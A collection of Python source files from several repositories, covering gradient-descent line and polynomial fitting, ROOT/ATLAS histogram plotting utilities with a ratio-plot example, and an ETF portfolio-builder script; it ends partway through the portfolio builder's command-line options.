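`calculate_error_2()` sums squared perpendicular (orthogonal) distances from each point to the line `y = m*x + c`, rather than vertical residuals. A quick sanity check against the closed-form point-to-line distance |m*x0 - y0 + c| / sqrt(m^2 + 1), with illustrative values:

```python
import math

def point_line_distance(m, c, x0, y0):
    # distance from the point (x0, y0) to the line y = m*x + c
    return abs(m * x0 - y0 + c) / math.sqrt(m ** 2 + 1)

# For the line y = 2x + 1 and the single point (3, 0),
# calculate_error_2(2, 1, [[3, 0]]) should equal point_line_distance(2, 1, 3, 0) ** 2
print(point_line_distance(2, 1, 3, 0) ** 2)  # 9.8
```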
#### File: joeybryson001/machine_learning/debug.py
```python
import math
import time
start_time = time.time()
data = [[0,1],[1,2],[2,3],[3,4],[4,5],[5,6],[100000000000000,-90000000000000]]
prediction_x_value = 90
start_m = -100
start_c = -20
acuracy_for_m = 0.00001
acuracy_for_c = 0.00001
step_size = 0.01
acceptible_error = 0.1
def calculate_error(m,c,data):
total_error_squared = 0
for i in range(len(data)):
estimate_y = m * data[i][0] + c
error = data[i][1] - estimate_y
total_error_squared += (error ** 2)
return total_error_squared
def calculate_error_2(m,c,data):
total_error_squared = 0
for i in range(len(data)):
y_intercept = data[i][1] + (data[i][0] / m)
x_of_closest_point = (y_intercept - c) / (m - ((-1) / m))
y_of_closest_point = m * x_of_closest_point + c
error = math.sqrt(((x_of_closest_point - data[i][0]) ** 2) + ((y_of_closest_point - data[i][1]) ** 2))
total_error_squared += error ** 2
return total_error_squared
def calculate_error_derivative(m,c,data):
c_derivative1 = calculate_error(m,c - acuracy_for_c,data)
c_derivative2 = calculate_error(m,c + acuracy_for_c,data)
c_derivative = (c_derivative1 - c_derivative2) / (-2 * acuracy_for_c)
m_derivative1 = calculate_error(m - acuracy_for_m,c,data)
m_derivative2 = calculate_error(m + acuracy_for_m,c,data)
m_derivative = (m_derivative1 - m_derivative2) / (-2 * acuracy_for_m)
return m_derivative, c_derivative
m = start_m
c = start_c
change_m, change_c = calculate_error_derivative(m,c,data)
while abs(change_m) + abs(change_c) > acceptible_error:
change_m,change_c = calculate_error_derivative(m,c,data)
m = m - step_size * change_m
c = c - step_size * change_c
print("time taken:"+str(time.time() - start_time))
print("prediction for x = "+str(prediction_x_value)+" is "+str(m * prediction_x_value + c))
print("final error is:"+str(calculate_error_derivative(m,c,data)))
print("equation of final line is:y = "+str(m)+"X + "+str(c))
```
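The derivative estimates in `calculate_error_derivative()` are plain central differences, f'(x) ≈ (f(x + h) - f(x - h)) / (2h). A standalone version of that idea, for illustration only:

```python
def central_difference(f, x, h=1e-5):
    """Second-order-accurate numerical derivative of f at x."""
    return (f(x + h) - f(x - h)) / (2 * h)

print(central_difference(lambda x: x ** 2, 3.0))  # ~ 6.0
```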
#### File: joeybryson001/machine_learning/plane_finder.py
```python
import math
import time

# NOTE: this fragment assumes that calculate_error(), calculate_error_derivative(),
# acuracy, counter, start_time, m, c and data are defined as in debug.py.
def calculate_differential(data, m, c):
    error1 = calculate_error(m + acuracy, c, data)
    error2 = calculate_error(m + acuracy * (3 ** (1 / 2)), c - acuracy * (3 ** (1 / 2)), data)
    error3 = calculate_error(m - acuracy * (3 ** (1 / 2)), c - acuracy * (3 ** (1 / 2)), data)
    return error1, error2, error3

print("iterations:" + str(counter))
print("time taken:" + str(time.time() - start_time))
print("final error is:" + str(calculate_error_derivative(m, c, data)))
if c > 0:
    print("equation of final line is:y = " + str(m) + "X + " + str(c))
else:
    print("equation of final line is:y = " + str(m) + "X " + str(c))
```
#### File: joeybryson001/machine_learning/polynomial_regession_final.py
```python
from matplotlib import pyplot as plt
import math
import time
def regress(data, final_graph_complexity, starting_params, h, step_size,epsilon, iterations = None):
def calculate_error(params, data, final_graph_complexity):
total_error_squared = 0
for i in range(len(data)):
estimate_y = 0
for l in range(final_graph_complexity):
                estimate_y += (data[i][0] ** (final_graph_complexity - 1 - l)) * params[l]
error = data[i][1] - estimate_y
total_error_squared += ((error) ** 2)
return total_error_squared
def calculate_error_derivative(params, data, h, final_graph_complexity):
derivitives = []
for i in range(final_graph_complexity):
param_upper = list(params)
param_lower = list(params)
param_upper[i] += h
param_lower[i] -= h
derivitives.append((calculate_error(param_upper, data, final_graph_complexity) - calculate_error(param_lower, data, final_graph_complexity)) / (2 * h))
print(derivitives[1]-derivitives[0])
return derivitives
params = []
for i in range(final_graph_complexity):
if (final_graph_complexity - i - len(starting_params)) > 0:
params.append(0)
else:
for i in range(len(starting_params)):
params.append(starting_params[i])
break
print(params)
print(calculate_error(params,data,final_graph_complexity))
params[0] += 0.00001
if not type(iterations) == int:
while True:
            delta = calculate_error_derivative(params, data, h, final_graph_complexity)
for l in range(final_graph_complexity):
                params[l] -= step_size * delta[l]
finished = 0
for i in range(final_graph_complexity):
                if -epsilon < delta[i] < epsilon:
finished += 1
if finished == final_graph_complexity:
break
else:
errors = []
derivitive_history = []
parameter_history = []
for i in range(iterations):
delta = calculate_error_derivative(params, data, h, final_graph_complexity)
for l in range(final_graph_complexity):
params[l] -= step_size * delta[l]
errors.append(calculate_error(params,data,final_graph_complexity))
derivitive_history.append(delta)
parameter_history.append(params[0])
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,30))
plt.plot(derivitive_history)
plt.show()
return params
print(regress([[1,1],[2,1],[3,1],[4,1],[5,1],[6,1]],2,[8,2],0.0001,0.000001,0.01,2000))
``` |
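With the exponent written as `final_graph_complexity - 1 - l`, `params` is ordered from the highest power down to the constant term. A small helper illustrating that convention (not part of the original script):

```python
def evaluate_polynomial(params, x):
    # params = [a_n, ..., a_1, a_0] represents a_n*x**n + ... + a_1*x + a_0
    degree = len(params) - 1
    return sum(p * x ** (degree - i) for i, p in enumerate(params))

print(evaluate_polynomial([2, 0, 1], 3))  # 2*3**2 + 0*3 + 1 = 19
```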
{
"source": "joeycarter/atlas-plot-utils",
"score": 3
} |
#### File: atlas-plot-utils/atlasplots/utils.py
```python
from __future__ import absolute_import, division, print_function
import sys
import datetime
import re
from atlasplots.console import bcolor
import ROOT as root
from ROOT import gDirectory
def DrawText(x, y, text, color=1, size=0.05):
"""Draw text.
Parameters
----------
x : float
x position in NDC coordinates
y : float
y position in NDC coordinates
    text : string
The text
color : int, optional
Text colour (the default is 1, i.e. black).
See https://root.cern.ch/doc/master/classTColor.html.
If you know the hex code, rgb values, etc., use ``ROOT.TColor.GetColor()``
size : float, optional
Text size
See https://root.cern.ch/doc/master/classTLatex.html
"""
l = root.TLatex()
# l.SetTextAlign(12)
l.SetTextSize(size)
l.SetNDC()
l.SetTextColor(color)
l.DrawLatex(x, y, text)
def GetTTree(filename, treename):
"""Get TTree from file(s).
Returns the TTree if reading a single file or a TChain if reading multiple
files from a directory. Exits if file or tree cannot be read.
Parameters
----------
filename : str
Name of ROOT file or the containing directory
treename : str
Name of TTree
Returns
-------
TTree or TChain
The TTree or TChain
"""
if filename.endswith(".root"):
file = root.TFile.Open(filename)
print("Reading in tree {} from {}... "
.format(bcolor.bold + treename + bcolor.end, filename), end="")
if not file:
# ROOT prints its own "file not found" message
print("{}".format(bcolor.red + "Failed" + bcolor.end))
sys.exit(1)
tree = file.Get(treename)
if not tree:
print("{}".format(bcolor.red + "Failed" + bcolor.end))
print("{} Tree '{}' not found in {}"
.format(bcolor.warning(), treename, filename))
# Look into file to see what else is there
items_in_file = file.GetListOfKeys()
if items_in_file is not None:
print("\nDid you mean:")
for item in items_in_file:
print(" * {}".format(item.GetName()))
sys.exit(1)
print("{}".format(bcolor.ok()))
else:
        # TODO: Exception handling
        file = None  # no single TFile to return when chaining multiple files
        chain = root.TChain(treename)
        chain.Add(filename + "/*.root")
        tree = chain
# tree.SetDirectory(0)
return file, tree
def GetTChain(filenames, treename):
"""Get TChain (list of Root files containing the same tree)
Parameters
----------
filenames : [str]
Name(s) of ROOT file(s)
treename : str
Name of TTree
Returns
-------
TTree or TChain
The TTree or TChain
"""
if type(filenames) is not list:
filenames = [filenames]
chain = root.TChain(treename)
for file in filenames:
chain.Add(file)
return chain
def MakeHistogram(tree, plotname, nbins, xmin, xmax, selections="", shift="", label=""):
"""Make histogram from a TTree.
Parameters
----------
tree : TTree
The tree from which the histogram is made
plotname : str
The plot name; i.e. the name of the branch (or variable) being plotted
nbins : int
Number of bins
xmin : float
Lower edge of first bin
xmax : float
Upper edge of last bin (not included in last bin)
selections : str, optional
Apply selections.
See ``TTree::Draw()`` at https://root.cern.ch/doc/master/classTTree.html
for more information
shift : str, optional
Shift histogram by this amount; subtacts this value from the variable
being plotted
label : str, optional
The histogram's label; i.e. the entry that will appear in the legend
Returns
-------
TH1
The histogram
"""
histname = plotname
# Use current time to uniquely identify histograms
unique_id = datetime.datetime.now().isoformat()
histname += "_{}".format(unique_id)
# Remove reserved characters
histname = histname.replace("/", "")
histname = histname.replace("*", "")
histname = histname.replace("(", "")
histname = histname.replace("-", "_")
histname = histname.replace(")", "")
histname = histname.replace(":", "")
histname = histname.replace(".", "")
indices = "({},{},{})".format(nbins, xmin, xmax)
if shift:
plotname += "-{}".format(shift)
tree.Draw(plotname + ">>" + histname + indices, selections, "e")
hist = gDirectory.Get(histname)
hist.SetDirectory(0)
if hist.GetEntries() == 0:
print("{} Histogram is empty!".format(bcolor.warning()))
if label:
hist.label = label
return hist
def SetHistogramLine(hist, color=1, width=1, style=1, alpha=1):
"""Set the histogram line properties.
See https://root.cern.ch/doc/master/classTAttLine.html for more information
on line properties.
Parameters
----------
hist : TH1
The histogram
color : int, optional
Line colour (the default is 1, i.e. black).
See https://root.cern.ch/doc/master/classTColor.html.
If you know the hex code, rgb values, etc., use ``ROOT.TColor.GetColor()``
width : int, optional
Line width in pixels; between 1 and 10 (the default is 1)
style : int, optional
Line style; between 1 and 10 (the default is 1, i.e. solid line)
alpha : float, optional
Line transparency; between 0 and 1 (the default is 1, i.e. opaque)
"""
hist.SetLineColor(color)
hist.SetLineWidth(width)
hist.SetLineStyle(style)
    hist.SetLineColorAlpha(color, alpha)
def SetHistogramFill(hist, color=None, style=None, alpha=1):
"""Set the histogram fill properties.
If ``SetHistogramFill()`` is called with no colour specified, the fill colour
is set to the same as the histogram's line colour.
See https://root.cern.ch/doc/master/classTAttFill.html for more information
on fill properties.
Parameters
----------
hist : TH1
The histogram
color : int, optional
Fill colour.
See https://root.cern.ch/doc/master/classTColor.html.
If you know the hex code, rgb values, etc., use ``ROOT.TColor.GetColor()``
style : int, optional
Fill style; this one's complicated so best to see the ROOT documentation
alpha : float, optional
Fill transparency; between 0 and 1 (the default is 1, i.e. opaque)
"""
if style is not None:
hist.SetFillStyle(style)
if color is not None:
hist.SetFillColor(color)
else:
hist.SetFillColor(hist.GetLineColor())
if alpha != 1:
hist.SetFillColorAlpha(color, alpha)
def FormatHistograms(hists, title="", xtitle="", ytitle="", xtitle_offset=None,
ytitle_offset=None, units="", max=None, min=0):
"""Format histograms and add axis labels.
Typically the y-axis label contains the bin width with units, for example,
"Events / 10 GeV". The preferred way to get the bin width is at run time
rather than computing it by hand and including it in the config file. So, if
no units are specified, the function will try to parse the units from the
x-axis label and apply it to the y-axis.
Parameters
----------
hists : [TH1]
List of histograms
title : str, optional
Histogram title; typically empty (the default is "")
xtitle : str, optional
x-axis label (the default is "")
ytitle : str, optional
y-axis label (the default is "")
xtitle_offset : float, optional
Label offset from x-axis (the default is None, i.e. use ROOT's default)
ytitle_offset : float, optional
Label offset from y-axis (the default is None, i.e. use ROOT's default)
units : str, optional
Units (the default is "")
max : float, optional
Histogram maximum value (the default is None)
min : float, optional
Histogram minimum value (the default is 0)
"""
# If hists is a single value, convert to list
if type(hists) is not list:
hists = [hists]
SetYRange(hists, max, min)
# Try to parse units from xtitle
if not units and xtitle:
pattern = re.compile(r".*\[(.*\w.*)\]\s*$")
match = pattern.search(xtitle)
if match:
units = match.group(1)
else:
units = ""
for hist in hists:
if title:
hist.SetTitle(title)
if xtitle:
hist.GetXaxis().SetTitle(xtitle)
        if ytitle:
            # build the label locally so repeated iterations don't keep appending to ytitle
            hist.GetYaxis().SetTitle(
                "{} / {:g} {}".format(ytitle, hist.GetXaxis().GetBinWidth(1), units)
            )
if xtitle_offset:
hist.GetXaxis().SetTitleOffset(xtitle_offset)
if ytitle_offset:
            hist.GetYaxis().SetTitleOffset(ytitle_offset)
def DrawHistograms(hists, options=""):
"""Draw the histograms.
The histograms should already have their formatting applied at this point
Parameters
----------
hists : [TH1]
List of histograms
options : str, optional
Drawing options (the default is "")
"""
# If hists is a single value, convert to list
if type(hists) is not list:
hists = [hists]
for i, hist in enumerate(hists):
if i == 0:
hist.Draw(options)
else:
hist.Draw("same " + options)
def NormalizeHistograms(hists, width=False):
"""Normalize a list of histograms to unity.
Parameters
----------
hists : [TH1]
List of histograms
width : bool, optional
If true, the bin contents and errors are divided by the bin width
(the default is False)
"""
# If hists is a single value, convert to list
if type(hists) is not list:
hists = [hists]
option = "width" if width else ""
for hist in hists:
hist.Scale(1.0 / hist.Integral(), option)
def GetMinimum(hists):
"""Get minimum value (i.e. value of 'shortest' bin) of a list of histograms.
Parameters
----------
hists : [TH1]
List of histograms
Returns
-------
float
Minimum value
"""
# If hists is a single value, convert to list
if type(hists) is not list:
hists = [hists]
histmin = hists[0].GetMinimum()
for hist in hists:
tmpmin = hist.GetMinimum()
if hist.GetMinimum() < histmin:
histmin = tmpmin
return histmin
def GetMaximum(hists):
"""Get maximum value (i.e. value of 'tallest' bin) of a list of histograms.
Parameters
----------
hists : [TH1]
List of histograms
Returns
-------
float
Maximum value
"""
# If hists is a single value, convert to list
if type(hists) is not list:
hists = [hists]
    histmax = hists[0].GetMaximum()
    for hist in hists:
        tmpmax = hist.GetMaximum()
        if hist.GetMaximum() > histmax:
            histmax = tmpmax
    return histmax
def SetYRange(hists, max=None, min=0):
"""Set the y-axis range (max and min) on a list of histograms.
If the max value is not provided, it calls :py:func:`GetMaximum` to get the
maximum value from the list of histograms
Parameters
----------
hists : [TH1]
List of histograms
max : float, optional
Max value (the default is None)
min : float, optional
Min value (the default is 0)
"""
# If hists is a single value, convert to list
if type(hists) is not list:
hists = [hists]
if max is None:
plotmax = GetMaximum(hists)
else:
plotmax = max
for hist in hists:
hist.GetYaxis().SetRangeUser(min, plotmax)
def MakePad(name, title, xlow, ylow, xup, yup):
"""Make a pad.
This function replaces the typical TPad constructor because of an
unfortunate quirk of PyROOT that forces you to set the ownership of the Pad
when creating it, otherwise it gives a segmentation fault.
See https://root.cern.ch/doc/master/classTPad.html.
Parameters
----------
name : str
Pad name
title : str
Pad title
xlow : float
The x position of the bottom left point of the pad
ylow : float
The y position of the bottom left point of the pad
xup : float
The x position of the top right point of the pad
yup : float
The y position of the top right point of the pad
"""
pad = root.TPad(name, title, xlow, ylow, xup, yup)
root.SetOwnership(pad, False)
return pad
def MakeLegend(hists, xmin=0.65, ymin=0.65, options="LF"):
"""Draw the legend.
Legend drawing options are:
* L: draw line associated with hists' lines
* P: draw polymarker associated with hists' marker
* F: draw a box with fill associated with hists' fill
* E: draw vertical error bar if option "L" is also specified
See https://root.cern.ch/doc/master/classTLegend.html for full details.
Parameters
----------
hists : [TH1]
List of histograms
xmin : float, optional
The x position of the bottom left point of the legend
(the default is 0.65)
ymin : float, optional
The y position of the bottom left point of the legend
(the default is 0.65)
options : string, optional
Pass these options to TLegend::AddEntry().
Default is "LF"
"""
# If hists is a single value, convert to list
if type(hists) is not list:
hists = [hists]
xmax = xmin + 0.10
ymax = ymin + 0.05 * (len(hists) + 1)
legend = root.TLegend(xmin, ymin, xmax, ymax)
legend.SetTextSize(0.03)
legend.SetFillColor(0)
legend.SetLineColor(0)
legend.SetBorderSize(0)
for hist in hists:
if hasattr(hist, 'label'):
legend.AddEntry(hist, hist.label, options)
else:
legend.AddEntry(hist)
print("{} Making legend but histogram '{}' has no label"
.format(bcolor.warning(), hist.GetTitle()))
return legend
def DrawLine(x1, y1, x2, y2, color=1, width=1, style=1, alpha=1):
"""Draw a line on a histogram.
See https://root.cern.ch/doc/master/classTAttLine.html for more information
on line properties.
Parameters
----------
x1, y1, x2, y2 : float
Line coordinates
color : int, optional
Line colour (the default is 1, i.e. black).
See https://root.cern.ch/doc/master/classTColor.html.
If you know the hex code, rgb values, etc., use ``ROOT.TColor.GetColor()``
width : int, optional
Line width in pixels; between 1 and 10 (the default is 1)
style : int, optional
Line style; between 1 and 10 (the default is 1, i.e. solid line)
alpha : float, optional
Line transparency; between 0 and 1 (the default is 1, i.e. opaque)
"""
line = root.TLine()
if color != 1:
line.SetLineColor(color)
if width != 1:
line.SetLineWidth(width)
if style != 1:
line.SetLineStyle(style)
if alpha != 1:
        line.SetLineColorAlpha(color, alpha)
line.DrawLine(x1, y1, x2, y2)
def DrawLineAt1(hist, color=1, width=1, style=1, alpha=1):
"""Draw a horizontal line at y=1 on a histogram.
This is particularly useful for ratio plots.
See https://root.cern.ch/doc/master/classTAttLine.html for more information
on line properties.
Parameters
----------
hist : TH1
The histogram on which to draw the line
color : int, optional
Line colour (the default is 1, i.e. black).
See https://root.cern.ch/doc/master/classTColor.html.
If you know the hex code, rgb values, etc., use ``ROOT.TColor.GetColor()``
width : int, optional
Line width in pixels; between 1 and 10 (the default is 1)
style : int, optional
Line style; between 1 and 10 (the default is 1, i.e. solid line)
alpha : float, optional
Line transparency; between 0 and 1 (the default is 1, i.e. opaque)
"""
line = root.TLine()
if color != 1:
line.SetLineColor(color)
if width != 1:
line.SetLineWidth(width)
if style != 1:
line.SetLineStyle(style)
if alpha != 1:
        line.SetLineColorAlpha(color, alpha)
line.DrawLine(
hist.GetXaxis().GetXmin(), 1,
hist.GetXaxis().GetXmax(), 1
)
```
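A compact usage sketch of the helpers above (the file, tree and branch names are placeholders; the ratio-plot example that follows shows the full workflow):

```python
import ROOT as root
from atlasplots import atlas_style as astyle
from atlasplots import utils

astyle.SetAtlasStyle()
canv = root.TCanvas("canv", "", 800, 600)
f, tree = utils.GetTTree("sample.root", "nominal")                  # placeholder file/tree
hist = utils.MakeHistogram(tree, "lep_pt", 50, 0, 500,
                           selections="lep_pt > 25", label="Data")  # label is picked up by MakeLegend
utils.SetHistogramLine(hist, color=root.kBlue, width=2)
utils.FormatHistograms(hist, xtitle="p_{T} [GeV]", ytitle="Events")
utils.DrawHistograms(hist, "hist")
legend = utils.MakeLegend(hist)
legend.Draw()
astyle.ATLASLabel(0.2, 0.86, "Internal")
canv.Print("lep_pt.pdf")
f.Close()
```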
#### File: atlas-plot-utils/examples/ratio_plot.py
```python
from __future__ import absolute_import, division, print_function
import os
import argparse
import ROOT as root
from ROOT import gPad
from atlasplots import atlas_style as astyle
from atlasplots import utils
from atlasplots import config_reader as config
def make_outdir(params):
"""Make the output directory.
Optionally place output directory in a parent directory indicating a version
number if provided.
Parameters
----------
params : dict
Dictionary of configuration parameters
Returns
-------
str
Output directory
"""
if 'version' not in params:
outdir = params['outdir']
if not os.path.exists(outdir):
os.makedirs(outdir)
else:
outdir = "{}/{}".format(params['outdir'], params['version'])
if not os.path.exists(outdir):
os.makedirs(outdir)
return outdir
def FormatRatioPlot(h, ymin, ymax, yLabel):
# Define range of y axis
h.SetMinimum(ymin)
h.SetMaximum(ymax)
# Set marker style and draw
h.SetMarkerStyle(20)
h.Draw("same e")
# Y axis ratio plot settings
h.GetYaxis().SetTitle(yLabel)
h.GetYaxis().SetTitleSize(26)
h.GetYaxis().SetTitleFont(43)
h.GetYaxis().SetTitleOffset(1.5)
h.GetYaxis().SetLabelFont(43)
h.GetYaxis().SetLabelSize(26)
h.GetYaxis().SetNdivisions(505)
# X axis ratio plot settings
h.GetXaxis().SetTitleSize(26)
h.GetXaxis().SetTitleFont(43)
h.GetXaxis().SetTitleOffset(4.)
h.GetXaxis().SetLabelFont(43)
h.GetXaxis().SetLabelSize(26)
h.GetXaxis().SetLabelOffset(0.04)
# Parse input arguments
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--verbose", action="store_true",
help="Be verbose")
parser.add_argument("-c", "--config", default="ratio_plot.config.toml",
help="config file")
args = parser.parse_args()
# Get plotting configuration parameters
params = config.read(args.config)
# Create output directory
outdir = make_outdir(params)
# Need to keep track of open files to read from TTree
open_files = []
# Load TTrees
for file in params['file']:
# Replace the tree name with the tree itself
# You can always get the name back with tree.GetName()
tmp_file, file['tree'] = utils.GetTTree(file['name'], file['tree'])
open_files.append(tmp_file)
# ---------- Loop over the set of kinematic variables and plot ---------- #
astyle.SetAtlasStyle()
for plot in params['plot']:
if args.verbose:
print("Creating plot {}".format(plot['name']))
# Create canvas
canv = root.TCanvas(
"canv_" + plot['name'], "", params['canvas']['w'], params['canvas']['h']
)
# List of histograms in plot
hists = []
# ----- Loop over the files and get trees ----- #
for file in params['file']:
if args.verbose:
print("Reading in branch from " + file['name'])
weight_str = "{}*{}".format(file['scale'], plot['cuts'])
if args.verbose:
print("Applying weight: " + weight_str)
hist = utils.MakeHistogram(
file['tree'], plot['name'],
plot['nbins'], plot['xmin'], plot['xmax'],
selections=weight_str,
label=file['label']
)
# Aesthetics
utils.SetHistogramLine(hist, root.TColor.GetColor(file['color']), 2)
if file['fill'] is not None:
utils.SetHistogramFill(hist, root.TColor.GetColor(file['fill']))
hists.append(hist)
# Normalizes histograms to unity
if params['norm']:
utils.NormalizeHistograms(hists)
# Amount to scale the y-axis to allow room for labels/legends
max_factor = 12 if params['logy'] else 1.2
hist_min = utils.GetMinimum(hists)
hist_max = utils.GetMaximum(hists)
# Format histogram
if params['norm']:
utils.FormatHistograms(
hists,
xtitle=plot['label'],
ytitle="Normalized to unity",
max=max_factor * hist_max,
min=0.5*hist_min if params['logy'] else 0
)
else:
utils.FormatHistograms(
hists,
xtitle=plot['label'],
ytitle="Events",
max=max_factor * hist_max,
min=0.5*hist_min + 0.0001 if params['logy'] else 0
)
# Build upper pad for histograms
hist_pad = utils.MakePad("histpad", "", 0, 0.3, 1, 1)
hist_pad.SetBottomMargin(0.03)
hist_pad.Draw()
hist_pad.cd()
utils.DrawHistograms(hists, "hist")
# Remove x-axis labels
for hist in hists:
hist.GetXaxis().SetLabelSize(0)
# Set logarithmic scale on y-axis
if params['logy']:
if args.verbose:
print("Set histogram y-axis to logarithmic scale")
gPad.SetLogy()
# Draw labels and legend on the canvas
astyle.ATLASLabel(0.2, 0.86, "Internal")
for label in params['label']:
utils.DrawText(label['x'], label['y'], label['text'], 1, 0.05)
if 'legend' in params:
legend = utils.MakeLegend(
hists, xmin=params['legend']['x'], ymin=params['legend']['y']
)
legend.Draw()
# Go back to the main canvas before defining lower pad
canv.cd()
# Build lower pad for ratio plots
ratio_pad = utils.MakePad("ratiopad", "", 0, 0, 1, 0.3)
ratio_pad.SetTopMargin(0.01)
ratio_pad.SetBottomMargin(0.35)
ratio_pad.SetGridy() # horizontal grid
ratio_pad.Draw()
ratio_pad.cd()
# Draw the ratio plots
ratio_hist = root.TH1F()
for i, hist in enumerate(hists):
if i == 0:
continue
else:
ratio_hist = hist.Clone("ratio_hist")
ratio_hist.Divide(hists[0])
ratio_hist.SetLineColor(1)
ratio_hist.SetMarkerColor(hist.GetLineColor())
FormatRatioPlot(ratio_hist, 0.4, 2.1, "Ratio")
# Draw line where ratio = 1
utils.DrawLineAt1(ratio_hist, color=2)
gPad.RedrawAxis()
canv.Print("{}/{}_{}.{}".format(
outdir, params['title'], plot['name'], params['ext'])
)
if args.verbose:
print("")
# Cleanup
for file in open_files:
file.Close()
``` |
{
"source": "joeycarter/portfolio-builder",
"score": 2
} |
#### File: joeycarter/portfolio-builder/portfolio-builder.py
```python
import datetime
import enum
import glob
import os
import sys
import click
import tabulate
import pandas as pd
import numpy as np
import yfinance as yf
# Custom exceptions
class PortfolioException(Exception):
"""Exceptions related to the portfolio builder."""
pass
# Error messages
def echo_warning(msg):
click.echo(f"{click.style('warning:', fg='yellow', bold=True)} {msg}", err=True)
def echo_error(msg):
click.echo(f"{click.style('error:', fg='red', bold=True)} {msg}", err=True)
def echo_fatal(msg):
click.echo(f"{click.style('fatal:', fg='red', bold=True)} {msg}", err=True)
class Mode(enum.Enum):
build = 1 # Build a portfolio from scratch
rebalance = 2 # Rebalance an existing portfolio
class Portfolio:
"""An object to represent a portfolio.
Parameters
----------
risk_level : int
Risk level (0 to 10).
targets : str
Either the path to file containing ETF allocation targets, or the name of a
predefined portfolio. If it is the latter, the portfolio builder will search the
`targets/` directory for a file of the form `<targets>.csv`, where `<targets>`
is the name provided.
account_file : str
Path to account data file. Account data is only used when rebalancing a
portfolio. If none is provided, the portfolio builder searches the 'accounts/'
directory for .csv files containing account data.
cash : float
Cash to invest (CAD).
fractions : bool
Allow fractions when computing number of shares to buy/sell. Normally these
numbers are required to be whole numbers.
mode : :class:`.Mode`
Portfolio mode. Choose from `build` (build a portfolio from scratch) and
`rebalance` (rebalance an existing portfolio).
verbose : bool, int
Be verbose.
"""
def __init__(
self, risk_level, targets, account_file, cash, fractions, mode, verbose
):
self.risk_level = risk_level
self.targets = targets
self.account_file = account_file
self.cash = cash
self.fractions = fractions
self.mode = mode
self.verbose = verbose
if os.path.isfile(self.targets):
self.allocations = pd.read_csv(self.targets, index_col=0)
elif os.path.isfile(os.path.join("targets", f"{self.targets}.csv")):
self.allocations = pd.read_csv(
os.path.join("targets", f"{self.targets}.csv"), index_col=0
)
else:
raise PortfolioException(f"could not open targets file '{self.targets}'")
self.current_prices = None
self.shares = None
if self.mode == Mode.build:
self.account = None
elif self.mode == Mode.rebalance:
self.account = self._read_account_data(self.account_file)
else:
raise PortfolioException(f"unknown portfolio mode '{self.mode}'")
def _read_account_data(self, account_file=None):
"""Read current account data.
If `account_file` is None, this function searches the 'accounts/' directory for
.csv files. If more than one file is found, the user is prompted to select which
one to use.
Parameters
----------
account_file : str, optional
Path to account data file. See note above if `None` is passed.
Returns
-------
account : pandas.DataFrame
Current account data as a pandas DataFrame.
"""
click.echo("Reading current account data...")
if account_file is None:
account_files = glob.glob("accounts/*.csv")
if len(account_files) == 1:
account_file = account_files[0]
elif len(account_files) > 1:
click.echo("Found multiple account data files:")
for i, account_file in enumerate(account_files):
click.echo(f" ({i}) {account_file}")
while True:
index = click.prompt(
"Please enter which account file you would like to use",
type=int,
)
if index >= 0 and index < len(account_files):
break
else:
click.echo(f"Error: invalid account file {index}")
account_file = account_files[index]
else:
raise PortfolioException("no account data file")
if self.verbose:
click.echo(f" -> Reading account data from file '{account_file}'")
account = pd.read_csv(account_file)
# You can add the target risk in your account data file for reference,
# but we do not want the dataframe to keep this information
if "risk" in account.columns:
account.drop("risk", axis="columns", inplace=True)
return account.iloc[0] # For now only return first row
def build(self):
"""Build the current portfolio based on current prices and available cash."""
click.echo("Retrieving current ETF prices...")
# Retrieve data for past 5 days
# Ensures data is available if running on a day when markets are closed
start_time = datetime.datetime.now() - datetime.timedelta(days=5)
self.current_prices = yf.download(
" ".join(self.allocations.columns), start=start_time
)["Close"].iloc[-1]
click.echo("Done")
# Use same ticker order
self.current_prices = self.current_prices.reindex(self.allocations.columns)
if self.mode == Mode.build:
# Build from scratch
self.shares = (
self.cash
* (self.allocations.loc[self.risk_level] / 100)
/ self.current_prices
)
elif self.mode == Mode.rebalance:
# Check that target and account securities agree
if not self.allocations.columns.equals(self.account.index):
raise PortfolioException("target and account securities do not agree")
# Rebalance current portfolio
self.shares = (
(self.allocations.loc[self.risk_level] / 100)
* (self.cash + np.sum(self.account * self.current_prices))
- self.account * self.current_prices
) / self.current_prices
if not self.fractions:
self.shares = np.floor(self.shares).astype("int")
if np.all(self.shares == 0):
echo_warning("Insufficient funds to build portfolio to targets")
click.echo()
def print_portfolio(self):
"""Print the built portfolio."""
if self.shares is None:
echo_warning("cannot display portfolio: portfolio has not been built yet")
return
if self.mode == Mode.build:
data = {
"ETF": self.shares.index.to_list(),
"Price\n(CAD)": self.current_prices.to_list(),
"To\nBuy/Sell": self.shares.to_list(),
"Value\n(CAD)": (self.shares * self.current_prices).to_list(),
"% of\nPortfolio": (
100
* (self.shares * self.current_prices)
/ np.sum(self.shares * self.current_prices)
).to_list(),
"Target % of\nPortfolio": self.allocations.loc[
self.risk_level
].to_list(),
}
if self.fractions:
fmt = ("", ".3f", ".2f", ".2f", ".2f", ".2f")
else:
fmt = ("", ".3f", "", ".2f", ".2f", ".2f")
elif self.mode == Mode.rebalance:
total_shares = self.shares + self.account
data = {
"ETF": self.shares.index.to_list(),
"Price\n(CAD)": self.current_prices.to_list(),
"Current\nQuantity": self.account.to_list(),
"To\nBuy/Sell": self.shares.to_list(),
"Total\nQuantity": total_shares.to_list(),
"Value\n(CAD)": (total_shares * self.current_prices).to_list(),
"% of\nPortfolio": (
100
* (total_shares * self.current_prices)
/ np.sum(total_shares * self.current_prices)
).to_list(),
"Target % of\nPortfolio": self.allocations.loc[
self.risk_level
].to_list(),
}
if self.fractions:
fmt = ("", ".3f", "", ".2f", ".2f", ".2f", ".2f", ".2f")
else:
fmt = ("", ".3f", "", "", ".2f", ".2f", ".2f", ".2f")
click.echo("Your portfolio:")
click.echo("~~~~~~~~~~~~~~~\n")
click.echo(tabulate.tabulate(data, headers="keys", floatfmt=fmt))
total_cost = np.sum(self.shares * self.current_prices)
leftover_cash = self.cash - total_cost
click.echo()
click.echo(f"Total cost: ${total_cost:.2f} CAD")
click.echo(f"Leftover cash: ${leftover_cash:.2f} CAD")
@click.command(context_settings=dict(help_option_names=["-h", "--help"]))
@click.option(
"-r",
"--risk-level",
type=click.IntRange(0, 10),
prompt="Enter your risk level (0 to 10)",
help="Risk level on a scale from 0 (all bonds) to 10 (all equities).",
)
@click.option(
"-t",
"--targets",
prompt=(
"Enter the path to file containing ETF allocation targets or the name of the"
" portfolio"
),
help=(
"Either the path to file containing ETF allocation targets, or the name of a"
" predefined portfolio. If it is the latter, the portfolio builder will search"
